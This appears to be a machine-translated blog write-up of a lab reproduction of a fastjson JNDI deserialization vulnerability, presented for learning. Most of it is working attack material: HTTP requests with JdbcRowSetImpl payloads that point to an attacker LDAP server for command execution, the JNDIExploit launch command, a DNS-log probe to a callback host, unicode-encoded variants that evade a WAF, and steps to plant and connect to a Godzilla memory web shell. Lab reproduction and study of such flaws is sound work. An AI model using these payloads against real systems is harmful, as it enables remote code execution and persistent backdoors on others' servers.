banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

fastjson vulnerability reproduction - 1247 - jndi

#漏洞复现44
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document outlines a process for exploiting a vulnerability in a Java application using FastJson and JNDI. It begins with setting up the environment and capturing login requests. The author demonstrates manipulating JSON syntax to trigger errors and test for vulnerabilities using DNS logs. The exploitation process involves launching a JNDI exploit tool and sending crafted payloads to the target application. The payloads utilize the `JdbcRowSetImpl` class to establish connections to a malicious LDAP server. The author also discusses techniques for bypassing filters, such as encoding payloads in hex and unicode. The document includes various payload examples and the steps taken to achieve remote code execution, emphasizing the importance of understanding the underlying exploitation process for educational purposes.

01-1247-jndi#

Vulnerability Exploitation#

Reference: https://github.com/lemono0/FastJsonPart

Focus on reproducing a process to understand the vulnerability exploitation flow. There are many excellent articles written by experts online, but they are not sufficient for foundational learning (especially regarding how to compile Java files using IDEA, how to resolve dependency issues, etc. -__-|). Therefore, I will write down the process of my reproduction.

Start the environment, access the site, and capture the login package.

Pasted image 20250102111457

Try to delete the right parenthesis of the JSON syntax to trigger an error.

Pasted image 20250102111558

DNS log test to check for vulnerabilities.

{
  "@type":"java.net.Inet4Address",
  "val":"9dny9mz50wyzzxt8yyg9mk2kkbq2es2h.oastify.com"
}

Pasted image 20250102111756

Error detection for fastjson version.

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250102111955

Start JNDI.

java -jar .\JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.80.53

Use TomcatBypass Queries.

ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho

Send the following payload.

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 280
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
cmd: whoami

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

Pasted image 20250102112359

Pasted image 20250102112444

Inject Godzilla's memory shell.

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 286
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/TomcatBypass/GodzillaMemshell",
        "autoCommit":true
    }
}

Pasted image 20250102113530

Payload:

ldap://0.0.0.0:1389/TomcatBypass/GodzillaMemshell /bteam.ico pass1024

Pasted image 20250102113503

02-1247-jndi-waf#

Start the environment, access the site, and capture the login package.

Pasted image 20250106105819

Delete the right parenthesis to trigger an error, indicating that the server parsed the JSON content.

Pasted image 20250106105947

Add double quotes, which also returns an error message.

Pasted image 20250106110038

Probe for the exact version of fastjson, found to be filtered.

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250106110159

Fastjson recognizes hex and unicode encoding, allowing payloads to be bypassed using hex and unicode encoding.

{
  "\u0040\u0074\u0079\u0070\u0065": "\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u006F\u0073\u0065\u0061\u0062\u006C\u0065"

Pasted image 20250106111051

Start JDK8.

Pasted image 20250106112259

Use a generic payload.

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.245:1389/TomcatBypass/TomcatEcho",
        "autoCommit":true
    }
}

Encoding.

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0045\u0063\u0068\u006F",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

Pasted image 20250106112338

Execute command.

Pasted image 20250106112420

Inject Godzilla memory shell.

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u006C\u0064\u0061\u0070\u003A\u002F\u002F\u0031\u0039\u0032\u002E\u0031\u0036\u0038\u002E\u0038\u0030\u002E\u0032\u0034\u0035\u003A\u0031\u0033\u0038\u0039\u002F\u0054\u006F\u006D\u0063\u0061\u0074\u0042\u0079\u0070\u0061\u0073\u0073\u002F\u0047\u006F\u0064\u007A\u0069\u006C\u006C\u0061\u004D\u0065\u006D\u0073\u0068\u0065\u006C\u006C",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

Pasted image 20250106143522

Godzilla connection.

http://192.168.80.53/bteam.ico
pass1024

Pasted image 20250106143543

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.